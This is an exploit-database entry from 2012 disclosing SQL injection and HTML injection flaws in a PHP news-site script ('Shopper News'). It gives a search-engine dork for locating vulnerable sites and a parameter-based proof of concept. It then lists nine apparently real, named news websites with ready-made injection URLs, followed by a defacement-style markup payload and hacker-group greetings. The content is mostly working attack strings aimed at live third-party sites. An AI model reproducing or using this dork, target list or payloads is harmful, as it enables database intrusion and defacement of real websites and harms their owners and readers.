Shopper News (Silver Lake Shopper News) Multiple Vulnerabilities

2012-08-25T00:00:00
ID 1337DAY-ID-19260
Type zdt
Reporter X-Cisadane
Modified 2012-08-25T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ================================================================
Shopper News (Silver Lake Shopper News) Multiple Vulnerabilities
================================================================

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Shopper News (Silver Lake Shopper News) Multiple Vulnerabilities
: # Date : 25 August 2012
: # Author : X-Cisadane
: # Contact Link : http://shoppernewsonline.com/ or [email protected]
: # Developed By : Adam More
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection Vulnerability & HTML Injection Vulnerability
: # Tested On : Mozilla Firefox 14.0.1 (Windows)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
intitle:Highdesert news Home

Proof of Concept
================
SQL Injection : http://victim site/<path>/displaynews.php?id=['SQL]
Example :
http://thedcnews.com/displaynews.php?id='25
http://thesilverlakesnews.com/displaynews.php?id='5088
http://www.thevictorvillenews.com/displaynews.php?id='26
http://www.hidesertnewsonline.com/displaynews.php?id='5125&s=267442
http://theapplevalleynews.com/displaynews.php?id=417'
http://www.thespringvalleylakenews.com/displaynews.php?id='5118&s=291303
http://thehesperianews.com/displaynews.php?id='5
http://thebarstownews.com/displaynews.php?id='5
http://theadelantonews.com/displaynews.php?id='5

HTML Injection : http://victim site/<path>/displaynews.php?id=[number id]>HTML Code Here
Example :
http://theapplevalleynews.com/displaynews.php?id=5065><h1><marquee>XSSed By : X-Cisadane</marquee><br>Greetz To : Winda Utari, Shinta Ambarwaty, etc</h1> 



#  0day.today [2018-01-09]  #